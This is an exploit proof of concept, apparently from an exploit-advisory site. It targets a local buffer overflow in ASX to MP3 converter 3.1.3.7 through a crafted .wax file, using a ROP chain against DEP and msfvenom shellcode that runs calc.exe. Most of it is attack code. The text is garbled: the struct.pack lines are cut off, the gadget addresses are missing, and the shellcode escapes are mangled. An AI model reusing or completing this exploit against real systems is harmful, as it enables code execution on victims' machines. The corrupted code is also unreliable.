Exploit/Advisories

# Exploit Title: ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP,ASLR Bypass) (PoC)
# Software Link Download: https://github.com/x00x00x00x00/ASXtoMP3Converter_3.1.3.7.2010.11.05/blob/master/ASXtoMP3Converter_3.1.3.7.2010.11.05.exe?raw=true
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-08-25
# Vulnerable Software: ASX to MP3 converter
# Version: 3.1.3.7.2010.11.05
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

# Proof of Concept :

# 1.- Run python code: asx_to_mp3_rop_exploit.py
# 2.- Works on DEP enabled for ASX2MP3Converter.exe
# 3.- Open "ASX2MP3Converter.exe"
# 4.- Click on "Load" Button
# 5.- Select generated file "asx_to_mp3_rop_exploit.wax".
# 6.- Click on "Open".
# 7.- Calc.exe runs.

#################################################################################################################################################

#Python "asx_to_mp3_rop_exploit.py" Code:

import struct
file = 'asx_to_mp3_rop_exploit.wax'

payload = "http://"
payload += "A" * 17417 + struct.pack('

## msfvenom -a x86 -p windows/exec cmd=calc -b "x00x0ax09" -f python

buf = ""
buf += "xbex4bxe7x94x8cxdbxcdxd9x74x24xf4x5ax33"
buf += "xc9xb1x30x31x72x13x03x72x13x83xeaxb7x05"
buf += "x61x70xafx48x8ax89x2fx2dx02x6cx1ex6dx70"
buf += "xe4x30x5dxf2xa8xbcx16x56x59x37x5ax7fx6e"
buf += "xf0xd1x59x41x01x49x99xc0x81x90xcex22xb8"
buf += "x5ax03x22xfdx87xeex76x56xc3x5dx67xd3x99"
buf += "x5dx0cxafx0cxe6xf1x67x2exc7xa7xfcx69xc7"
buf += "x46xd1x01x4ex51x36x2fx18xeax8cxdbx9bx3a"
buf += "xddx24x37x03xd2xd6x49x43xd4x08x3cxbdx27"
buf += "xb4x47x7ax5ax62xcdx99xfcxe1x75x46xfdx26"
buf += "xe3x0dxf1x83x67x49x15x15xabxe1x21x9ex4a"
buf += "x26xa0xe4x68xe2xe9xbfx11xb3x57x11x2dxa3"
buf += "x38xcex8bxafxd4x1bxa6xedxb2xdax34x88xf0"
buf += "xddx46x93xa4xb5x77x18x2bxc1x87xcbx08x3d"
buf += "xc2x56x38xd6x8bx02x79xbbx2bxf9xbdxc2xaf"
buf += "x08x3dx31xafx78x38x7dx77x90x30xeex12x96"
buf += "xe7x0fx37xf5x66x9cxdbxfa"

## Save allocation type (0x1000) in EDX
payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('

## Save the address of VirtualAlloc() in ESI
payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('

## Save the size of the block in EBX
payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('

## Save the address of esp in EBP
payload += struct.pack('payload += struct.pack('

##Save memory protection code (0x40) in ECX
payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('

## Save ROP-NOP in EDI
payload += struct.pack('payload += struct.pack('

## Set up the EAX register to contain the address of # PUSHAD #RETN and JMP to this address
payload += struct.pack('payload += struct.pack('payload += struct.pack('payload += struct.pack('

payload += "x90" * 4
payload += struct.pack('payload += "x90" * 20
payload += buf

f = open(file,'w')
f.write(payload)
f.close()

Comments are closed.